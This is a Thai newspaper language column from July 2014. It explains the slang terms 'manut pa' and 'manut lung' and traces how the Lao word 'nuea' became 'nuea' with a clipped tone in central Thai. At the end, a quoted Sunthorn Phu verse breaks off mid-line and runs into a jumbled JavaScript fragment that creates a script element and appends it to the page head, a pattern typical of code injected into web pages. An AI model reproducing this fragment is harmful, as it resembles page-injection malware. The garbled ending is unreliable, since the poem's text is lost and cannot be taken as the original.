Download PDF

มติชนรายวัน ฉบับประจำวันพุธที่ 2 กรกฎาคม  2557

 

มนุษย์ป้า, มนุษย์ลุง

          มนุษย์ป้า คำนี้ผมได้ยินคนอื่นพูด และได้อ่านที่มีคนอื่นเขียน เมื่อไม่นานมานี้ แต่ไม่เข้าใจ แปลว่าอะไร? หมายถึงอะไร? แล้วหันรีหันขวางไม่รู้จะถามใคร

          จนพบคำอธิบายดีเยี่ยมอยู่ในบทรายงานเรื่องมนุษย์ลุง“กำนัน” พิมพ์ในมติชนสุดสัปดาห์ (ฉบับประจำวันที่ 27 มิถุนายน-3 กรกฎาคม 2557 หน้า 12) จะคัดมาแบ่งปันให้รู้กว้างขวาง ดังนี้

          ‘มนุษย์ป้า’ กลายเป็นคำในเชิงลบ ที่สื่อถึงหญิงในวัย 40 ปีขึ้นไป มีพฤติกรรมที่มุ่งเอาประโยชน์เฉพาะตนไม่สนใจกฎกติกาใดๆ ไปเรียบร้อยแล้ว

          ส่วน ‘มนุษย์ลุง’ ยังไม่มีนิยามที่ชัดเจนนักว่า จะมีนัยออกไปทางใด”

          เมื่อรู้ความหมายของมนุษย์ป้า ผมหัวเราะบ้าคนเดียวในใจ เพราะโดนบ่อยด้วยตัวเองทุกครั้งที่ไปซื้อของในตลาด จะต้องถูกแซงข้ามหูข้ามหัวเป็นปกติจากมนุษย์ป้า ซึ่งผมต้องยืนหัวเราะทุกครั้ง เพราะทำอะไรไม่ได้ น่ากลัวมากๆ

          มนุษย์ลุง แปลว่าอะไร? หมายถึงอะไร? ยังไม่พบคำตอบ แต่ในสุดสัปดาห์ตอนจบบทรายงาน บอกไว้เองว่า

          “มนุษย์ลุง‘กำนัน’ไม่ธรรมดาหรอก”

 

เหน้อ, เหน่อ

          เหน้อ อ่านว่า เน่อ (หางเสียงทอดยาว) เป็นคำดั้งเดิมเก่าแก่ของคนในวัฒนธรรมลาว ที่มีหลักแหล่งอยู่ลุ่มน้ำโขง

          เมื่อเคลื่อนย้ายจากลุ่มน้ำโขงลงลุ่มน้ำเจ้าพระยา คำว่า เหน้อ ก็กลายเสียงเป็น เหน่อ อ่านว่า เหฺน่อ (สั้นห้วน)

          เหน้อ กลายเสียงเป็น เหน่อ อย่างน้อยตั้งแต่ยุคต้นกรุงรัตนโกสินทร์ (ซึ่งอาจกลายแล้วก่อนหน้านี้ก็ได้) ดังมีโคลงนิราศสุพรรณของสุนทรภู่ แต่งสมัย ร.3 บอกว่า

          ลาวอยู่รู้เสียงสนอง      เหน่อช้าd.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);